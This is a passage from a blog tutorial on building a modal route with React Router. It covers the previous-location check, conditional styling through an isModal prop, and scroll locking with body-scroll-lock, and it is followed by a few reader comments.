this.previousLocation !== location, we can make sure that refreshing the page will not result in setting isModal to true. When the modal route is visited directly, which is modal/1 in our example, then none of the checks are true. Now we can use this boolean value to both render the <Route/> outside of the <Switch/>, and to decide which location object to pass to location prop of <Switch/>. Given that <Modal/> component has the necessary stylings, this results in two different views rendering on top of each other. constructor(props){ super(props); this.previousLocation = this.props.location; } componentWillUpdate() { const { location } = this.props; if (!(location.state && location.state.modal)) { this.previousLocation = this.props.location; } } render() { const { location } = this.props; const isModal = ( location.state && location.state.modal && this.previousLocation !== location );" component={Modal} /> : null } </div> ); } Rendering different modal views So far we have implemented our modal in a way that ensures we don’t render an overlay when refreshing a page with an open modal, or when directly visiting a modal route. Instead, we only render the matching <Route/> inside <Switch/>. In this case, the styling you want to apply is likely to be different, or you might want to show a different content. This is pretty easy to achieve by passing the isModal variable as a prop on the <Modal/> component, as shown below. Then, depending on the value of the prop, you can apply different stylings or return a completely different markup."> <Modal isModal /> </Route> : null } </div> ); Preventing the scroll underneath the modal When you open the modal on some browsers it may have the content below scrolling underneath the modal, which is not a desirable interaction. Using overflow: hidden on body is the first attempt to block scrolling on the entire page. However, although this method works fine on desktop, it fails on mobile Safari since it basically ignores overflow: hidden on body. There are several different npm packages attempting to remedy this scroll locking issue virtually across all platforms. I found the body-scroll-lock package quite useful. From this package, you can import disableBodyScroll and enableBodyScroll functions, which accept a reference to the element for which you want scrolling to persist as an input. When the modal is open we want to disable scrolling for the entire page, except for the modal itself. Therefore, we need to call disableBodyScroll and enableBodyScroll functions when the modal component is mounted and unmounted, respectively. To get a reference to the parent <div> of the modal component, we can use the createRef API from React and pass it as a ref to the parent <div>. The code snippet below disables scrolling when the modal is open and enables it again when the modal component is about to be unmounted. Using this.modalRef as the input for these imported functions prevents the content of the modal component from being scroll-locked. Before using the disableBodyScroll function, we need a simple check. This is because a modal component might get mounted if the page is refreshed when a modal is open, or when the modal route is visited directly. In both cases, scrolling should not be disabled. We have already passed the isModal variable as a prop to the <Modal/> component to render different views, so we can just use this prop to check if there is actually a modal. Below is the modified version of the modal component: import { disableBodyScroll, enableBodyScroll } from 'body-scroll-lock'; class Modal extends Component { constructor(props) { super(props); this.modalRef = React.createRef(); } componentDidMount() { const { isModal } = this.props; if (isModal) { disableBodyScroll(this.modalRef.current); } } componentWillUnmount() { enableBodyScroll(this.modalRef.current); } render() { return ( <div ref={this.modalRef} className="modal-wrapper" onClick={() => this.props.history.goBack()} > <div className="modal" onClick={e => e.stopPropagation()} > </div> </div> ) } } Conclusion You now have an understanding of how a modal view works, as well as a sense of some of the problems you may encounter while implementing your own integration. For the fully functional example, visit this code sandbox “Building a modal module for React with React-Router” Thanks for the tutorial. I just don’t understand why you didn’t make with class components that are 10 times longer and useless complicated instead of the modern super simple functional components. I’m crying to convert all the files Great tutorial and thanks. I found this behavior: On refresh page with opened modal, you lose the previous location value and then it renders only the modal component. Is there any way when refresh page to keep the background and the modal being opened? Thanks for this post. Any idea how to implement this with functional components?
https://blog.logrocket.com/building-a-modal-module-for-react-with-react-router/
CC-MAIN-2022-05
refinedweb
2,123
54.42
To unlink an entry, the following code is used: int c_unlink (resmgr_context_t *ctp, io_unlink_t *msg, RESMGR_HANDLE_T *handle, void *reserved) { des_t parent, target; int sts; struct _client_info cinfo; if (sts = iofunc_client_info (ctp, 0, &cinfo)) { return (sts); } if (connect_msg_to_attr (ctp, &msg -> connect, handle, &parent, &target, &sts, &cinfo)) { return (sts); } if (sts != EOK) { return (sts); } // see below if (target.attr == handle) { return (EBUSY); } return (cfs_rmnod (&parent, target.name, target.attr)); } The code implementing c_unlink() is straightforward as well—we get the client information and resolve the pathname. The destination had better exist, so if we don't get an EOK we return the error to the client. Also, it's a really bad idea (read: bug) to unlink the mount point, so we make a special check against the target attribute's being equal to the mount point attribute, and return EBUSY if that's the case. Note that QNX 4 returns the constant EBUSY, QNX Neutrino returns EPERM, and OpenBSD returns EISDIR. So, there are plenty of constants to choose from in the real world! I like EBUSY. Other than that, the actual work is done in cfs_rmnod(), below. int cfs_rmnod (des_t *parent, char *name, cfs_attr_t *attr) { int sts; int i; // 1) remove target attr -> attr.nlink--; if ((sts = release_attr (attr)) != EOK) { return (sts); } // 2) remove the directory entry out of the parent for (i = 0; i < parent -> attr -> nels; i++) { // 3) skip empty directory entries if (parent -> attr -> type.dirblocks [i].name == NULL) { continue; } if (!strcmp (parent -> attr -> type.dirblocks [i].name, name)) { break; } } if (i == parent -> attr -> nels) { // huh. gone. This is either some kind of internal error, // or a race condition. return (ENOENT); } // 4) reclaim the space, and zero out the entry free (parent -> attr -> type.dirblocks [i].name); parent -> attr -> type.dirblocks [i].name = NULL; // 5) catch shrinkage at the tail end of the dirblocks[] while (parent -> attr -> type.dirblocks [parent -> attr -> nels - 1].name == NULL) { parent -> attr -> nels--; } // 6) could check the open count and do other reclamation // magic here, but we don't *have to* for now... return (EOK); } Notice that we may not necessarily reclaim the space occupied by the resource! That's because the file could be in use by someone else. So the only time that it's appropriate to actually remove it is when the link count goes to zero, and that's checked for in the release_attr() routine as well as in the io_close_ocb() handler (below). Here's the walkthrough:
http://www.qnx.com/developers/docs/6.6.0_anm11_wf10/com.qnx.doc.neutrino.cookbook/topic/s2_ramdisk_c_unlink.html
CC-MAIN-2018-09
refinedweb
409
64.91
Opened 11 years ago Closed 11 years ago #953 closed enhancement (invalid) helper functions to get/set file dependant cache data Description from django.core.cache import cache import sha, os FILE_CACHE_TIMEOUT = 60 * 60 * 60 * 24 * 31 # 1 month FILE_CACHE_FMT = '%(name)s_%(hash)s' def set_cached_file(path, value): """ Store file dependent data in cache. Timeout is set to FILE_CACHE_TIMEOUT (1month). Key is created from base name of file and SHA1 digest of the path. """ mtime = os.path.getmtime(path) sh = sha.new() sh.update(path) hash = sh.hexdigest() name = os.path.basename(path) cache.set(FILE_CACHE_FMT % locals(), (mtime, value,), FILE_CACHE_TIMEOUT) # def get_cached_file(path, default=None): """ Get file content from cache. If modification time differ return None and delete data from cache. """ sh = sha.new() sh.update(path) hash = sh.hexdigest() name = os.path.basename(path) key = FILE_CACHE_FMT % locals() cached = cache.get(key, default) if cached is None: return None mtime, value = cached if (not os.path.isfile(path)) or (os.path.getmtime(path) != mtime): # file is changed or deleted cache.delete(key) # delete from cache return None else: return value # Change History (2) comment:1 Changed 11 years ago by comment:2 Changed 11 years ago by Sorry, I didn't think before I send this ticket. :) This is just pair of helper functions to manage cache entries which are dependent on some file stored data. Probably ticket is not the right place for this, so I'm closing this. Note: See TracTickets for help on using tickets. Can you please explain what this is and why you're filing it as a ticket?
https://code.djangoproject.com/ticket/953
CC-MAIN-2016-50
refinedweb
264
77.13
21 October 2010 16:08 [Source: ICIS news] LONDON (ICIS)--Education cuts announced as part of UK chancellor George Osborne’s spending review on 20 October pose a grave risk to industry, David Brown, CEO of the Institution of Chemical Engineers (IChemE), said on Thursday. Brown said that cuts to the education budget could harm the ?xml:namespace> “If we can’t produce enough talented scientists and engineers each year to meet industry demand, inward investment will suffer and our economic prosperity will be further weakened,” Brown said. In addition, Brown said that the decision to freeze the science budget in cash terms would also mean that tough times are ahead; however, he cautiously welcomed the news, saying that things could have been considerably worse. “The The UK energy and climate change budget was also cut by 5% and Brown urged caution on where the savings might be made. “…slashing investment in low-carbon technology now will cost more money in the longer term,” he said. (
http://www.icis.com/Articles/2010/10/21/9403445/education-budget-cuts-pose-grave-risk-to-uk-industry-icheme.html
CC-MAIN-2015-11
refinedweb
166
52.83
clock_gettime(3) BSD Library Functions Manual clock_gettime(3) NAME clock_gettime, clock_settime, clock_getres, clock_gettime_nsec_np -- get/set date and time SYNOPSIS #include <time.h> int clock_gettime(clockid_t clock_id, struct timespec *tp); int clock_settime(clockid_t clock_id, const struct timespec *tp); int clock_getres(clockid_t clock_id, struct timespec *tp); uint64_t clock_gettime_nsec_np(clockid_t clock_id); DESCRIPTION The clock_gettime() and clock_settime() functions allow the calling process to retrieve or set the value used by a clock which is specified by clock_id. clock_id can be a value from one of 5 predefined values: CLOCK_REALTIME the system's real time (i.e. wall time) clock, expressed as the amount of time since the Epoch. This is the same as the value returned by gettimeofday(2). CLOCK_MONOTONIC clock that increments monotonically, tracking the time since an arbitrary point, and will continue to incre- ment while the system is asleep. CLOCK_MONOTONIC_RAW clock that increments monotonically, tracking the time since an arbitrary point like CLOCK_MONOTONIC. How- ever, this clock is unaffected by frequency or time adjustments. It should not be compared to other sys- tem time sources. CLOCK_MONOTONIC_RAW_APPROX like CLOCK_MONOTONIC_RAW, but reads a value cached by the system at context switch. This can be read faster, but at a loss of accuracy as it may return values that are milliseconds old. CLOCK_UPTIME_RAW clock that increments monotonically, in the same man- ner as CLOCK_MONOTONIC_RAW, but that does not incre- ment while the system is asleep. The returned value is identical to the result of mach_absolute_time() after the appropriate mach_timebase conversion is applied. CLOCK_UPTIME_RAW_APPROX like CLOCK_UPTIME_RAW, but reads a value cached by the system at context switch. This can be read faster, but at a loss of accuracy as it may return values that are milliseconds old. CLOCK_PROCESS_CPUTIME_ID clock that tracks the amount of CPU (in user- or ker- nel-mode) used by the calling process. CLOCK_THREAD_CPUTIME_ID clock that tracks the amount of CPU (in user- or ker- nel-mode) used by the calling thread. The structure pointed to by tp is defined in <sys/time.h> as: struct timespec { time_t tv_sec; /* seconds */ long tv_nsec; /* and nanoseconds */ }; Only the CLOCK_REALTIME clock can be set, and only the superuser may do so. The resolution of a clock is returned by the clock_getres() call. This value is placed in a (non-null) *tp. This value may be smaller than the actual precision of the underlying clock, but represents a lower bound on the resolution. As a non-portable extension, the clock_gettime_nsec_np() function will return the clock value in 64-bit nanoseconds. RETURN VALUES A 0 return value indicates that the call succeeded. A -1 return value indicates an error occurred, and in this case an error code is stored into the global variable errno. For clock_gettime_nsec_np() a return value of non-0 indicates success. A 0 return value indicates an error occurred and an error code is stored in errno. ERRORS clock_gettime(), clock_settime(), clock_getres(), and clock_gettime_nsec_np() will fail if: [EINVAL] clock_id is not a valid value. [EFAULT] The tp argument address referenced invalid memory. In addition, clock_settime() may return the following errors: [EPERM] A user other than the superuser attempted to set the time. [EINVAL] clock_id specifies a clock that isn't settable, tp specifies a nanosecond value less than zero or greater than 1000 million, or a value outside the range of the specified clock. SEE ALSO date(1), getitimer(2), gettimeofday(2), HISTORY These functions first appeared in Mac OSX 10.12 STANDARDS The clock_gettime(), clock_settime(), and clock_getres() system calls conform to IEEE Std 1003.1b-1993 (``POSIX.1''). cleck_gettime_nsec_np() is a non-portable Darwin extension. The clock IDs CLOCK_MONOTONIC_RAW and CLOCK_UPTIME_RAW are extensions to the POSIX interface. BSD January 26, 2016 BSD Mac OS X 10.12.3 - Generated Wed Feb 8 05:51:11 CST 2017
http://www.manpagez.com/man/3/clock_gettime_nsec_np/
CC-MAIN-2020-05
refinedweb
623
55.24
#include <Wire.h>int slaveIn;void setup() { Wire.begin();}void loop() { Wire.requestFrom(1, 1); while(Wire.available()==0); slaveIn = Wire.read(); Serial.println(slaveIn); delay(1000);} #include <Wire.h>int counter = 0;void setup() { Wire.begin(1);}void loop() { Wire.onRequest(request);}void request(){ Wire.write(counter); counter++;} I'm having trouble getting the master to request a byte of data, the slave to send that data, and then the master to print that data. QuoteI'm having trouble getting the master to request a byte of data, the slave to send that data, and then the master to print that data.But, you want to keep the problem a secret. Well, then, we'll need to keep the solution a secret, too.Wire.onRequest() registers an event handler to be called when an event occurs. You only need to do that once, in setup(). Please enter a valid email to subscribe We need to confirm your email address. To complete the subscription, please click the link in the Thank you for subscribing! Arduino via Egeo 16 Torino, 10131 Italy
http://forum.arduino.cc/index.php?topic=148028.0;prev_next=prev
CC-MAIN-2015-06
refinedweb
181
71